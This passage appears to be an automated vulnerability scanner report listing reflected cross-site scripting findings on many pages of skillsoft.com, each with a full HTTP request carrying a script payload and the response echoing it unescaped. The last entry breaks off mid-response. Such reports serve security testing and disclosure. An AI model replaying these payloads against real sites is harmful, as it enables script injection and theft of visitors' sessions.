1.9. http://skillsoft.com/Books24x7/Product_Information/Collections/GovEssentials.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/GovEssentials.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f3f7"><script>alert(1)</script>4f85686a10a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/GovEssentials.asp?1f3f7"><script>alert(1)</script>4f85686a10a=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44414
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/GovEssentials.asp?1f3f7"><script>alert(1)</script>4f85686a10a=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.10. http://skillsoft.com/Books24x7/Product_Information/Collections/ITIL_B24.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/ITIL_B24.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a3e0"><script>alert(1)</script>0420a192829 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/ITIL_B24.asp?1a3e0"><script>alert(1)</script>0420a192829=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44704
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/ITIL_B24.asp?1a3e0"><script>alert(1)</script>0420a192829=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.11. http://skillsoft.com/Books24x7/Product_Information/Collections/ITPro.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/ITPro.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58447"><script>alert(1)</script>bcc1bfa0dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/ITPro.asp?58447"><script>alert(1)</script>bcc1bfa0dc=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46351
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/ITPro.asp?58447"><script>alert(1)</script>bcc1bfa0dc=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.12. http://skillsoft.com/Books24x7/Product_Information/Collections/ManagerSuite.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/ManagerSuite.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8436"><script>alert(1)</script>af1f1861c19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/ManagerSuite.asp?a8436"><script>alert(1)</script>af1f1861c19=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45183
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/ManagerSuite.asp?a8436"><script>alert(1)</script>af1f1861c19=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.13. http://skillsoft.com/Books24x7/Product_Information/Collections/OfficeEssentials.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/OfficeEssentials.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8278b"><script>alert(1)</script>797c3071add was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/OfficeEssentials.asp?8278b"><script>alert(1)</script>797c3071add=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44629
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/OfficeEssentials.asp?8278b"><script>alert(1)</script>797c3071add=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.14. http://skillsoft.com/Books24x7/Product_Information/Collections/Oracle.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/Oracle.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0a9f"><script>alert(1)</script>84db274ee86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/Oracle.asp?e0a9f"><script>alert(1)</script>84db274ee86=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43877
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/Oracle.asp?e0a9f"><script>alert(1)</script>84db274ee86=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.15. http://skillsoft.com/Books24x7/Product_Information/Collections/Spanish.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/Spanish.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91235"><script>alert(1)</script>b05454c9d6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/Spanish.asp?91235"><script>alert(1)</script>b05454c9d6e=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46282
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/Spanish.asp?91235"><script>alert(1)</script>b05454c9d6e=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.16. http://skillsoft.com/Books24x7/Product_Information/Collections/WellBeingEssentials.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/WellBeingEssentials.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42397"><script>alert(1)</script>6bc16219b9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/WellBeingEssentials.asp?42397"><script>alert(1)</script>6bc16219b9d=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44494
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/WellBeingEssentials.asp?42397"><script>alert(1)</script>6bc16219b9d=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.17. http://skillsoft.com/Books24x7/Product_Information/Collections/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f964"><script>alert(1)</script>ac679aaca8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Books24x7/Product_Information/Collections/default.asp?1f964"><script>alert(1)</script>ac679aaca8a=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45091
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/Books24x7/Product_Information/Collections/default.asp?1f964"><script>alert(1)</script>ac679aaca8a=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.18. http://skillsoft.com/about/awards.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/awards.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edc01"><script>alert(1)</script>a718b112bb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/awards.asp?edc01"><script>alert(1)</script>a718b112bb1=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45654
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/awards.asp?edc01"><script>alert(1)</script>a718b112bb1=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.19. http://skillsoft.com/about/case_studies.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/case_studies.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e61"><script>alert(1)</script>95470158500 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/case_studies.asp?e3e61"><script>alert(1)</script>95470158500=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 117983
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:45:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/case_studies.asp?e3e61"><script>alert(1)</script>95470158500=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.20. http://skillsoft.com/about/case_studies.asp [order parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/case_studies.asp

Issue detail

The value of the order request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68381"><script>alert(1)</script>c72762c0b5d was submitted in the order parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/case_studies.asp?sort=case_study&order=descending68381"><script>alert(1)</script>c72762c0b5d HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 118013
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/case_studies.asp?sort=case_study&order=descending68381"><script>alert(1)</script>c72762c0b5d&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.21. http://skillsoft.com/about/case_studies.asp [sort parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/case_studies.asp

Issue detail

The value of the sort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0e3c"><script>alert(1)</script>bc55161493f was submitted in the sort parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/case_studies.asp?sort=case_studyc0e3c"><script>alert(1)</script>bc55161493f&order=descending HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 118013
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/case_studies.asp?sort=case_studyc0e3c"><script>alert(1)</script>bc55161493f&order=descending&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.22. http://skillsoft.com/about/company_history.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/company_history.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39695"><script>alert(1)</script>fe3c48a9787 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/company_history.asp?39695"><script>alert(1)</script>fe3c48a9787=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40851
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/company_history.asp?39695"><script>alert(1)</script>fe3c48a9787=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.23. http://skillsoft.com/about/contact/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/contact/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dedc"><script>alert(1)</script>e599050bd3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/contact/default.asp?2dedc"><script>alert(1)</script>e599050bd3b=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42688
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/contact/default.asp?2dedc"><script>alert(1)</script>e599050bd3b=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.24. http://skillsoft.com/about/credit_programs/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/credit_programs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10ed9"><script>alert(1)</script>3597c79e6d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/credit_programs/?10ed9"><script>alert(1)</script>3597c79e6d7=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
